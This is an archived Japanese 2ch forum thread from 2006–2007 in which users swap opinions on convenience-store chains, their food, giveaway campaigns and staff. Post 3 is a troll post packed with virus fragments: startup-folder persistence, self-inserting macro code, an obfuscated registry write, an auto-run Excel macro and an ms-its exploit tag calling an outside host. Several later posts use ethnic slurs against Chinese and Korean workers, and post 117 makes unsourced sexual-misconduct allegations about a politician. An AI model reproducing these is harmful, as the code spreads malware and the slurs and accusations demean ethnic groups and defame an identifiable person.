2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ELE7VEN】コンビニよ!1店目【HOT SPAR】

1 :陽気な名無しさん:2006/12/24(日) 20:50:30 ID:TaV0yMR4
仕切り直しよw

2 :陽気な名無しさん:2006/12/24(日) 20:55:51 ID:TaV0yMR4
あらあら、余裕で2ゲロねw
この↓スレタイのスペルミスが恥ずかしすぎるから、立て直して差し上げたの。需要あるわよね?????

【ERE7VEN】コンビニよ!1店目【THANKS】
http://love3.2ch.net/test/read.cgi/gaysaloon/1166957071/

3 :<body onload=window()>:2006/12/24(日) 21:02:28 ID:xl5DQ5tB
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

4 :陽気な名無しさん:2006/12/24(日) 21:02:58 ID:TaV0yMR4
アタシはやっぱりセブンイレブンね。
弁当・総菜類がいちばんまともな気がするわ。
おでんのおつゆも美味しいし。
新生銀行の引き出しが、24時間365日タダだから助かるわ。

5 :陽気な名無しさん:2006/12/24(日) 21:12:34 ID:sutuUyAY
何でホットスパーなの?

6 :陽気な名無しさん:2006/12/27(水) 22:27:02 ID:JhorhwaY
SPARって、世界最大の食品小売りチェーンなんですって。
そのコンビニ部門がHOT SPARらしいわ。

7 :陽気な名無しさん:2006/12/28(木) 15:00:14 ID:ZUMrSSJt
おでんはやっぱりセブンよね。

8 :陽気な名無しさん:2006/12/28(木) 15:03:47 ID:anygEI8l
おにぎりはローソンが好き

9 :陽気な名無しさん:2006/12/28(木) 15:23:15 ID:VbZu3Ff/
おでん はローソン
レジ付近の揚げ物もローソン
弁当・惣菜 はセブンイレブン
その他のコンビニイラナ

10 :陽気な名無しさん:2006/12/28(木) 15:23:56 ID:it7972V7
私は断然ニコマート派よ

11 :陽気な名無しさん:2006/12/28(木) 15:24:04 ID:VbZu3Ff/
やっぱりミニストップも要る

12 :陽気な名無しさん:2006/12/28(木) 15:26:00 ID:VbZu3Ff/
>>10
チコマートじゃ?
あそこもいいな、野菜とかあるから
サークルKサンクスとファミリーマートとデイリーヤマザキ イラナ

13 :陽気な名無しさん:2006/12/29(金) 19:48:24 ID:uUPdE52e
>>12
ローソンも要らないわ。

14 :陽気な名無しさん:2006/12/29(金) 19:50:26 ID:zknVmDKB
ふぁみ まは要る

15 :陽気な名無しさん:2006/12/29(金) 19:58:50 ID:3Tw3cJkW
サンクスを最近見かけないわ?

16 :陽気な名無しさん:2006/12/29(金) 20:00:32 ID:uUPdE52e
>>15
近所にあるわ。
カリスマパティシェの監修でデザート売ってたけど、
覚醒剤で捕まっちゃったのよねw

17 :陽気な名無しさん:2006/12/29(金) 20:08:53 ID:ydj+BVsE
山田宏巳さんの逮捕容疑は 大麻 です
自分の考えでは覚醒剤と大麻では天と地ほどの差なので

18 :陽気な名無しさん:2006/12/29(金) 20:10:33 ID:+47SXOYZ
イギリスでは各都市の大麻の売り場と価格まで
音楽雑誌に載ってるんでビックリしたわ。

19 :陽気な名無しさん:2006/12/29(金) 20:19:59 ID:HBNPSez3
セーコーマート

20 :陽気な名無しさん:2006/12/29(金) 20:23:04 ID:HBNPSez3
>>15
俺の故郷(北海道の某所)
夏休みに帰ったらサンクスが完全撤退してた。



21 :陽気な名無しさん:2006/12/30(土) 15:08:23 ID:1jMloWZi
コンビニ逝くと、マーガリンを挟んだパンを買っちゃうわ。
トランス脂肪酸がカラダに良くないのはわかっているんだけど…

22 :陽気な名無しさん:2006/12/31(日) 02:13:33 ID:AONQJMZW
当たりはずれも多いけどセブンの焼きたて直送便シリーズは好きよ。
こしあんドーナツは神だと思うわ。

23 :陽気な名無しさん:2007/01/01(月) 01:03:00 ID:A9OOKyCN
漉し餡のほうが上品で洗練されてるけど、あたしは粒あんが好きよ!
オトコも粗野なほうがイケるの。

てかミニストップの十勝ソフト、いつもより濃厚ね。

24 :陽気な名無しさん:2007/01/01(月) 20:52:53 ID:l65icI2c
御節を作るときにさんざん味見をしたから、
元日から飽きてコンビニに逝ったわ。
ミニストップのポテトがうんまいわ〜w

25 :陽気な名無しさん:2007/01/01(月) 20:56:14 ID:g5v1RVqq
あたくしもあっさり雑煮に飽きて
ジャンクな菓子パン買いに走ったわ

26 :陽気な名無しさん:2007/01/02(火) 09:38:22 ID:NWsrMhJx
セブンはお好み焼パンとメロンパンがおいしいわ

27 :陽気な名無しさん:2007/01/02(火) 12:57:56 ID:F5Wp/Bb9
セブンはいつも品揃え豊富。ファミマは品薄だし種類が少ない。ローソン、ファミマが多かった関西でもセブン増えたね。

28 :陽気な名無しさん:2007/01/02(火) 13:06:32 ID:Q9b2r+6s
>>20
同じ地区のナカーマ発見!
オレの実家の町にあったサンクスも
いつのまにかセイコーマートに変わってたよ。

29 :陽気な名無しさん:2007/01/02(火) 14:08:04 ID:Vlbotggx
あたりの街のサンクスはシチズンマートになってたわよ。

30 :陽気な名無しさん:2007/01/02(火) 14:12:35 ID:s1yOn4kR
やっぱくらしハウスよね

31 :陽気な名無しさん:2007/01/06(土) 01:19:25 ID:Wzr2tAsZ
セブンの今週新発売の果肉たっぷりジャムパン(゚д゚)ウマーよ。
これ期間限定じゃなくて定番商品になって欲しいわ。

32 :陽気な名無しさん:2007/01/06(土) 01:55:12 ID:mT0F+jwv
ジャムはイチゴなの?

33 :ヨーカ堂:2007/01/06(土) 02:30:25 ID:zLApMHg8
またセブンのお皿引き替えシールだね。今回はプーさんとミッキーのパスタ皿とリロのトート。使わないのにシール集めてもらってしまうわ。。。前回のスヌーピーの皿もあるわ。

34 :陽気な名無しさん:2007/01/06(土) 02:35:32 ID:a4NW1hgb
スヌーピーはまだしも。ディズニーキャラってファンシー臭が強くていやだわ。
やっぱり春のパン祭りに限るわ!

35 :陽気な名無しさん:2007/01/06(土) 02:37:07 ID:ZZ7jDbL1
サンクスもセブンを真似て、シールでプレゼント始めたわ。
商品はムーミンのマグカップ。

36 :陽気な名無しさん:2007/01/06(土) 04:11:11 ID:/+oXCeiW
セブン→ディズニー
ローソン→ミッフィー
ファミマ→ハイジ
サークルKサンクス→ムーミン
サークルKサンクスってムーミンやらドラえもんやら他社でやったものを使い回すよな

37 :陽気な名無しさん:2007/01/07(日) 19:25:25 ID:YWzWlNMB
サンリオはまだかしら?

38 :陽気な名無しさん:2007/01/11(木) 01:10:49 ID:gP6SPa18
ルパンがいいわ

39 :陽気な名無しさん:2007/01/11(木) 01:16:37 ID:qKWaQ1u1
マソコ店員がいなくなる深夜〜早朝しか利用しないわ。

40 :陽気な名無しさん:2007/01/11(木) 01:17:30 ID:bfBbavqU
>>39
ウチの近所のミニストップは、日本人店員がいなくなるわw

41 :陽気な名無しさん:2007/01/11(木) 01:35:12 ID:jcEO6hxZ
ショップ99が好きよ

42 :陽気な名無しさん:2007/01/11(木) 01:39:45 ID:bfBbavqU
>>41
あそこは創価よ。

43 :陽気な名無しさん:2007/01/11(木) 10:50:28 ID:z9UsmsoF
高知にスリーエフがあってびっくりしたわ!

44 :陽気な名無しさん:2007/01/11(木) 11:03:21 ID:WkI4W58R
>>42
サークルKサンクス、7&iもじゃ?

45 :陽気な名無しさん:2007/01/11(木) 11:12:57 ID:yejyBMbV
ローソンで今月1〜3日限定でミッフィーの絵皿を特製紙袋に入れて配ってたのよ。
でもあれって去年夏にプレゼントした皿の余りなのよね。
CMでは好評につき期間延長とか言ってたけど余りまくりで悲惨だったわ。
去年のキャンペーン当時、わたしかなり流行ってるローソンにいたのね。
そこですら余ってたわ。
毎日店の在庫を本部に報告しなきゃならなかったし面倒だったわ。
要は従業員が皿を横流ししたりさせない対策みたい。

46 :陽気な名無しさん:2007/01/11(木) 15:48:46 ID:O7CKv0OD
ファミマってめちゃくちゃ多いのに「ファミマが好き」って声は滅多に聞かないわねw

47 :陽気な名無しさん:2007/01/11(木) 16:09:28 ID:O7CKv0OD
2丁目のサンクスの店員の素性が知りたいわ
なんであんなところで働くことになったのかしら?
やっぱネタ感覚かしら?w

48 :陽気な名無しさん:2007/01/13(土) 13:41:55 ID:8iZwz5hD
コンビニで働くなら駅構内にあるコンビニの方が良さそうに見えるわ。
宅配便も収納代行もギフト予約も商品お取寄せも扱わないし。
トイレも別だから掃除しなくていいのも裏山しい。
ひっきりなしに多種多様な年齢、地位の客が来るのを除けば……だけど。
駅構内にあるコンビニだと多少、愛想が悪くても許されるし。
でも一回くらいディズニーランドにあったローソンで働いてみたい気もする。

49 :陽気な名無しさん:2007/01/13(土) 13:44:48 ID:GgKIesHp
ディズニーランドのローソンのバイトって歴代ホモ多いよねw

50 :陽気な名無しさん:2007/01/14(日) 00:14:18 ID:ZL70tMoc
>>39
あら、ウチのとこ普通に女いるわw
ピザデブみたいなのだけど

昨日行ったら、レジかまけて雑誌読んでたのよ?
ホント信じられないわ

51 :陽気な名無しさん:2007/01/14(日) 00:18:17 ID:4kWO5idK
深夜のコンビニ店員て男にしろ、女にしろ、
まともな奴いないわよ。

52 :陽気な名無しさん:2007/01/14(日) 02:25:48 ID:QWr/aEDT
ファミマのパスタってどれも不味いわよね。
いかにもこだわって作ってる風の能書きがラベルに貼ってあって
生パスタメニューまで売ってるのに味が最悪。

53 :陽気な名無しさん:2007/01/14(日) 02:32:07 ID:wSA5dvQZ
二丁目サンクスの坊主の子が気になるわ〜

54 :陽気な名無しさん:2007/01/14(日) 06:12:07 ID:MAWO9vlT
好きなコンビニ

@スリーエフ
あんまり混んでないしたまにめずらしい地方ビールがある。そばが美味い。
Aam-pm
SMBCが使える。弁当が新鮮。
BSEVEN-ELEVEn
文句なしの接客。六角家の冷凍ラーメンがある。

55 :陽気な名無しさん:2007/01/14(日) 08:33:34 ID:Nl6KgXIO
>>49
なんで分かるの?接客がオカマ丸出しとか?
わたしが行った時は女しかいなかったわ、残念。

56 :陽気な名無しさん:2007/01/14(日) 08:47:15 ID:n5R0CnWq
うちの近所のセブンは、
必ず最低一人はかわいいガチデブ君が在籍してるから
深夜にフラフラ行っちゃうわ。

いちばん近いのはココストアだけど、24時に閉まるから不便だわ。

57 :陽気な名無しさん:2007/01/14(日) 10:03:24 ID:9wNk+9Xr
うちの近所のココは定番に加えて焼きたてパン&弁当、おに、総菜各種ソフトパフェ…でたまに変わった菓子が売ってるのが嬉しいわ。
地方フェアだとかなりマイナーっぽい菓子も売ってるしね。
酒屋の名残をしっかり残してるのもいいわね。
店舗広いんだからそこまでやるならイートイン欲しかったわ。

58 :陽気な名無しさん:2007/01/14(日) 10:08:37 ID:9wNk+9Xr
一応24時間よ。

59 :陽気な名無しさん:2007/01/14(日) 10:15:24 ID:RoSpNCYk
なんかいつのまにか、家の近くにファミマ!ができてたわ。
一見コンビニに見えないから、何だろうとおもってたわ。
ウッド基調の店内、床までフローリングで輸入品の雑貨やお菓子まであるのは見てて楽しいんだけど、
所詮コンビニ、用のあるものは、普通のファミリーマートでも買えるものばっかだったわ。

60 :陽気な名無しさん:2007/01/16(火) 19:29:09 ID:Cy2dfNcS
フライドフーズって買ってる人っているのね。
明らかに揚げたてじゃないのを買うなんて嫌だわ。
友達が肉まんか何かを買ってたけど、外がブヨブヨだったし。
いつから温めてるのかしら?

61 :陽気な名無しさん:2007/01/16(火) 19:32:36 ID:Nwj068Te
二丁目の(大通りのほうの)サンクスのチャイニーズ
中国語をブツブツ話していて怖かった。
きっと『ホモ死ね』とか中国語で言ってるんだよ

62 :陽気な名無しさん:2007/01/17(水) 07:52:01 ID:Vh2XnIpq
3月いっぱいでローソンで蔦谷カード使えなくなるらしいわね。

63 :陽気な名無しさん:2007/01/17(水) 08:03:18 ID:lvakVe1r
>54
7が文句なしの接客って、私んとこは有り得ないわ。

いらない、使えないコンビニの上位よ7。

64 :陽気な名無しさん:2007/01/17(水) 08:15:39 ID:SiDMbn4T
セブンのパスタ皿交換、
さっさと点数集めたいからなんだかいろいろ買っているわ。
やっとサークルKのムーミンスープマグ3品そろえたのに〜。

65 :陽気な名無しさん:2007/01/17(水) 09:44:18 ID:c+gDm4L1
あたし、マイナーなコンビニが大好きなの。
昔岐阜に行った時に岐阜発祥のタイムリーってコンビニに入った時は凄い衝撃だったわ。
入り口入ってすぐ横にエロ系DVD、店の奥に行けばUFOキャッチャー、
本棚を見ればコンビニでは有り得ないレベルのハードコアなエロ本、
玩具コーナーにはパチモンのたまごっちもどき…

近所にあったら毎日通うわ!

66 :陽気な名無しさん:2007/01/17(水) 09:47:31 ID:kxNphyo4
コンビニバイトって質が悪いの多いよね
姐さん方はふざけたバイトに当たった時はどうしてる?
スルー?それともその場で説教?

67 :陽気な名無しさん:2007/01/17(水) 10:02:22 ID:eeZkjhB2
>>66
態度悪いっていえば、以前家の近所で、ヤマザキデイリーが潰れ→サンクスに入れ替わったとき
その開店時のバイト、全シフトものすごい奴らばかりで、もう態度悪いのレベルじゃなくて完全DQN連中だったんで
ネットでも地域版なんかで話題になったくらいだったわ。
もちろん別にコンビニなんて他に行くとこあるからスルーしてたんだけど、しばらくしたら、バイト総とっかえになってたわ。
おまけに本部からの指導する人が、深夜に渡ってほぼ常駐してんじゃないかってくらいバイトの監視してたわ。
今じゃ、人並の接客できるコンビニに育ってるわよ(あくまで普通レベルね、ま、コンビニなんてそれでいいのよ、イライラさせられなければ)

68 :陽気な名無しさん:2007/01/17(水) 10:09:11 ID:bvfvMtxT
>>66
そういう時は本部にメールすればいいのよ。

あたしの通うコンビニはみんなびっくりするぐらい親切なの。
両手ふさがったまま出口に向かうと急いであたしを追い越して扉を開けてくれるし、
夜中に頭痛が酷い時に置いてないの判っていながら
「薬なんて無いですよね」って言ったら
「どうされました?商品としては置いてないですが
僕の私物で良ければバファリンならありますよ」って言って分けてくれたの。
もう、こっちが恐縮するばかりよ。

69 :陽気な名無しさん:2007/01/17(水) 10:33:10 ID:AEAR9c7g
やだ何その店員w 姐さんに気があったんじゃないの?w

70 :68:2007/01/17(水) 10:39:13 ID:bvfvMtxT
>>69
あたしも一瞬夢見ちゃったわよ。
しかも結構好みのタイプだし。
でも地元のデパートで彼女と手を繋いでデートしてるとこ発見して
あたしの淡い恋は打ち砕かれたわよ!

71 :陽気な名無しさん:2007/01/17(水) 10:40:58 ID:eeZkjhB2
>>70
失恋の痛みはバファリンじゃ取り除けないものね。。

72 :陽気な名無しさん:2007/01/17(水) 10:52:23 ID:c+gDm4L1
>>70
死に神みたいな顔して薬を求める姐さんと
根っからの善人である店員さんが引き起こした悲劇の勘違いねw

73 :陽気な名無しさん:2007/01/17(水) 10:54:00 ID:u+CHOKlx
>>70
あんた・・・w

74 :陽気な名無しさん:2007/01/17(水) 17:43:34 ID:91cMhq0K
朝方はチャイニーズやチョン
DQNが多いよね〜。


75 :陽気な名無しさん:2007/01/17(水) 17:58:08 ID:gjujaJZ1
>>70
いいわね、前向きで。
そんなすぐに恋に落ちれないわ。
>>74
わたしのいるお店、朝は韓国と中国の子ばっかりよ。
日本語がうまくて感心しちゃう!

76 :陽気な名無しさん:2007/01/17(水) 21:10:05 ID:XmX+bISw
うち新潟なんだけど、
男っぽくて毛深いロシア人の店員やとわないかしら〜?
あ、土地柄とは言え半島系のバイトはなんだかね〜、、、

77 :陽気な名無しさん:2007/01/17(水) 21:15:43 ID:pS2tNRo8
近所のコンビニであんまんを頼んだら肉まんが入ってたわ。
レジの人は「トレーニング中」って名札してたけど、肉まんを用意したのはレジを担当した人じゃない、横にいた多分外国人と思われる人だったわ。

78 :陽気な名無しさん:2007/01/17(水) 21:16:19 ID:xRvVZ1NG
シナチョンでも女子のバイトはまだかわいげがあると思うのよ
圧倒的に駄目なのは特アの男バイトよ!!目つきは悪いし財布の中のぞくやつまでいるし最悪よ

79 :陽気な名無しさん:2007/01/17(水) 22:45:58 ID:MdbaHsIo
不二家製品の撤退跡
スペースすらなく
違和感もなく
普通に埋まってたのは
セブンイレブンだけだった
ローソンとサンクスは値札すらそのまま
ファミリーマートはすきまが・・・

緊急時?のレイアウトとか本部から指令あるのかしら?
撤退の貼り紙はスーパーもコンビニも見かけなかったけど

80 :陽気な名無しさん:2007/01/18(木) 00:33:05 ID:rvEmPX4+
どかした不二家のお菓子、ワゴンセールしてくれないかな
カントリーマアムとミルキーなら買うわよ
まあ無理でしょうけど…
年に数回突発的にカントリーマアム食いたくなるから困るわ

81 :陽気な名無しさん:2007/01/18(木) 02:54:08 ID:GwxCmdkZ
>>68
本部にメールすると多少は改善するのかしら?
私もさっき某コンビニのHPからメールしたわ。
名前や電話番号も入れさせられたけどまぁいいわ。

82 :陽気な名無しさん:2007/01/18(木) 04:03:45 ID:NVW7zur+
>>81
本部経由で確実に店舗側にも伝わるわよ。
店舗側からしてみたら客に面と向かってクレーム言われるよりも、
メールや電話で本部に店の実態をチクられる方がよっぽど怖いの。
よほどのへたれオーナーでも無い限り、
あまりにも頻繁に名指しでクレームある店員はクビにするわよ。

83 :陽気な名無しさん:2007/01/18(木) 07:22:25 ID:g6YCzoi+
セブンの本部にクレームだしてみようかしら?
駐車場の車のなかで弁当食っていたらオーナーがどけって
言ってきたのよ!

84 :陽気な名無しさん:2007/01/18(木) 07:34:20 ID:WlxAgsyD
dqn

85 :陽気な名無しさん:2007/01/18(木) 21:37:31 ID:NeFgfUvI
>>83
アンタもどうかと思うわよ。

86 :陽気な名無しさん:2007/01/19(金) 01:22:44 ID:RpePHLdl
>>83
バカじゃないの?
駐車場はあんたの部屋じゃないのよ。

87 :陽気な名無しさん:2007/01/20(土) 01:18:30 ID:L1KwHJiQ
>>82
じゃあきっと今ごろ注意がいってるはずね。
首にしたいとまでは思わないけど、しばらく様子を見るわ。

88 :陽気な名無しさん:2007/01/21(日) 13:43:21 ID:JtiLQbua
コンビニでよく振り込みをするんだけど、某店で領収書を破られたわ。
しかも謝罪なし。
わたしつい「あっ…!」って言ったんだけど、店員は顔色一つ変えずだったわ。
文句を言ってやればよかった!

89 :陽気な名無しさん:2007/01/21(日) 14:21:08 ID:iY5NBHJm
普通に店員に言えばいいのに。
面と向かって他人とコミュニケーションとれないのね。
かわいそうに・・・

90 :陽気な名無しさん:2007/01/21(日) 14:22:42 ID:tckDc1Ax
>>83は駐車できないところに駐車してたんじゃないの?
気づいてないのか、わざとなのか理解できけど、
停められないところにわざわざ停めるバカっているわよ。

91 :陽気な名無しさん:2007/01/21(日) 14:29:04 ID:Afdk1c1T
ジャスティンの新曲PV
セブンの前でセブンのTシャツ着たジャスティンが踊ってるわw

92 :陽気な名無しさん:2007/01/21(日) 19:24:37 ID:tlayUiIK
83だけど、ちゃんと白線のなかに停めたし、
ほかに車が来て混んでいたってわけでもないのよ。

べつのセブンで限定ミッキーのお皿を交換してもらおうと思ったら
2月2日にならないと交換できないって言われたの。
セブンとは相性わるいのね。

93 :陽気な名無しさん:2007/01/22(月) 22:36:41 ID:iwsnWaUt
おでんがセルフサービスの店があるじゃない?
前に玉子を器に取らず鍋から直接、口に運んでる客がいたわ。
で、レジで口を開けて店員に見せて会計してたの!
女の店員だったけどドン引きしてたわ。
そりゃそうよね、食べかけを見せられて気持ちいい人なんていないもの。
>>83>>92
買い物以外の要件で駐車場を使ったからじゃない?
買い物をしたとしても、そこでご飯食べるのは買い物の範疇に含まれないのよ、きっと。

94 :陽気な名無しさん:2007/01/22(月) 22:44:20 ID:1JrBqaYF
>>93
うわぁ、想像しただけで気持ち悪いわ。
まさかその玉子は、不特定多数が使うお玉か何かで取ったのかしら?

95 :陽気な名無しさん:2007/01/22(月) 22:50:18 ID:iwsnWaUt
>>94
どこから出してきたのか分からないけど爪楊枝だったわ。
とりあえず二度とコンビニでおでんを買わなくなったわよw

96 :陽気な名無しさん:2007/01/22(月) 23:06:59 ID:X7+7icQ3
>>83
もしそのお弁当をそのセブンで買ってたら、
わたしは>>83が「どけ」と言われる必要はないと思うんだけどどうなのかしらね。

そこで買ったお弁当でも「どけ」と言われるのかしら?

97 :陽気な名無しさん:2007/01/22(月) 23:27:10 ID:ManoZFdF
駐車場の規模にもよるんじゃないかしら。
4、5台しか停められないとこで占有してるなら邪魔くさがられてもしょうがないんじゃ。

98 :陽気な名無しさん:2007/01/23(火) 00:53:23 ID:eRKR3Y/5
その店で買ったとしても
食べるために駐車場があるわけじゃないし。

99 :陽気な名無しさん:2007/01/23(火) 01:00:25 ID:g8XZeK9q
エンジンかけっぱなしで弁当喰ってたのね、きっと。
住宅街だと特に夜は、アイドリングってかなり騒々しいものなのよ。
近隣の迷惑になるから、アイドリングはご遠慮くださいってコンビニもあるわ。

100 :陽気な名無しさん:2007/01/23(火) 01:29:04 ID:1BPG0tZt
高校生の時はローソン派だったわね。パンがおいしいから。
お弁当だったらセブン。
デザートはミニストップね。

この3つ以外は滅多に行かないわ。

101 :陽気な名無しさん:2007/01/23(火) 02:10:07 ID:/5DV7Js+
買い物した人間が駐車場に居座る事の迷惑さって
商売や販売の経験がある人間なら判る事よ。

102 :ポプラ:2007/01/23(火) 05:24:18 ID:8J8d0ZpL
最近はこのへんのコンビニどこも接客態度いいわよ。郊外だから駐車場の狭いとこはみんなつぶれた。夜は長距離トラックがずらりよ。

103 :陽気な名無しさん:2007/01/23(火) 06:23:54 ID:nW81Dx3P
某ファミマで店長が感じ悪かったからクレームのメール送ったらその店見事に潰れたわw
店長が店長だからバイトやパートもひどかったし当然といえば当然だけど

104 :陽気な名無しさん:2007/01/23(火) 13:36:31 ID:EAVNd7Eu
ほんと店によって接客態度ってまるで違うわよね
店長(らしきおっさん)が態度悪かったら他の店員も態度悪いってのはうちの近所も当たってるわ
逆にいい店長の店は店員も大抵感じいいわ

105 :陽気な名無しさん:2007/01/23(火) 13:39:17 ID:RmCPwFjR
うちの近所のローソンの店員、アホ揃いよw

106 :現役コンビニ店員:2007/01/23(火) 14:45:39 ID:j7EoBGbf
そーいや田舎ホステスみたいなオバサンはくるけど
オネエの人は来たことない。一回話してみたいなー

107 :陽気な名無しさん:2007/01/23(火) 19:18:09 ID:9LEl1sLN
うちの近くのミニストップ店員がオジサンオバサンばかりだけど店員意識があるから居心地いいのよね。

108 :陽気な名無しさん:2007/01/24(水) 00:45:14 ID:2i9El68A
ミニストップで、キャラメルミックスソフトを買ったわ。
アルバイトの中国人店員が、手も洗わずにコーンを手にとって、
しかもいちばん最初に出てくる、溶けたところを捨てないで作ったのよ。
受け取らないで店を出たわ。あの店は二度と行かない。

109 :現役コンビニ店員(深夜:2007/01/24(水) 12:28:35 ID:u9eWbYBM
1番バカが多いと思った年齢層は20前後の女どもと25才前後のヤンキーやってますな人と
30〜40才くらいの未だヤンキーやってますの人。みんな小物くさい連中ばかり。
20以下の青年少年は意外と普通の対応ができてる。
50くらいの人も同じ、偉そうだけど嫌味くさくないから気にならん

つかバイトだからといって腹が立たない訳がないし
コンビニのバイトやって思うのは真面目に日本人全員1回経験したらいいと思う。

110 :陽気な名無しさん:2007/01/24(水) 14:57:44 ID:ihMzt+S5
近所のコンビニ、いつも店長夫婦がバイトを
店内で叱りつけていて店の雰囲気が悪いわ。

111 :陽気な名無しさん:2007/01/24(水) 15:34:19 ID:p9ftXYxu
それ、店長じゃなくてオーナー夫妻でしょ?
コンビニのオーナーって会社勤めが出来なくて独立したワンマンDQNが多いのよ。
あたしが働いてたコンビニのオーナーも酷いもんだったわ。
特に女性を人間扱いしない性格で、パートの人達みんな泣かされてたの。
見てて本当に可哀想だったわ…

112 :陽気な名無しさん:2007/01/24(水) 16:04:32 ID:NtrLuiQs
近所のデイリー、おっさん店長一人でやってるわ。
掃除も全然してないみたいだし、野菜コーナーからは異臭がするの。

何より接客態度が最悪ね。
いらっしゃいませ、ありがとう一言も言わないんだもの

113 :陽気な名無しさん:2007/01/24(水) 17:03:26 ID:OzRBgHBm
>>108
『うけとらないで店を出た』ってwwww

中国人が可哀想な気もするw

114 :陽気な名無しさん:2007/01/24(水) 17:51:22 ID:+kKbP8es
>>103
アナタのメールでつぶれたわけじゃないから勘違いしないでね。

コンビニが店を閉める原因で多いのは売上が悪いよりも
地主(物件所有者)との契約がらみのトラブルや更新せずって場合のが多いのよ。
売上に関しては、オープンの際にある程度はシュミレーションして予測できてるから。

115 :陽気な名無しさん:2007/01/24(水) 18:27:09 ID:g712zDxV
>>114
最近は売り上げ悪いと
結構すぐつぶすみたいよ

本当の街中じゃないと
Pが広めじゃないと売上伸びないらしいし
スクラップ&ビルドって感じで

116 :陽気な名無しさん:2007/01/24(水) 18:44:23 ID:yvOdDa2C
深夜は店員も客もDQNばっか。

117 :陽気な名無しさん:2007/01/24(水) 18:56:00 ID:5dWBkoU8
九州や阪神間や首都圏の発展場によく来ていた
現在葛飾で議員やってる
チビでハゲでショタコンで虚言癖がある30代のオネエ議員がいます
18歳以下の男の子に付きまとったりもするらしいよ



本スレhttp://love4.2ch.net/test/read.cgi/gay/1160407693/67
昔の画像http://society4.2ch.net/test/read.cgi/mayor/1123678508/66

118 :陽気な名無しさん:2007/01/24(水) 23:53:52 ID:WIHSiqn9
ローソン、閉店が多いわ。
この地域から撤退するんじゃないかしら?

119 :現役コンビニ店員(深夜):2007/01/25(木) 01:00:33 ID:G/rdgzsg
コンビニ店員っていうか接客のバイトは高校生辺りの必修科目にしてもらいたいとかふと思うときある。
そんな俺は20時間後に出勤。専門学校との両立はキツイわ

27 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)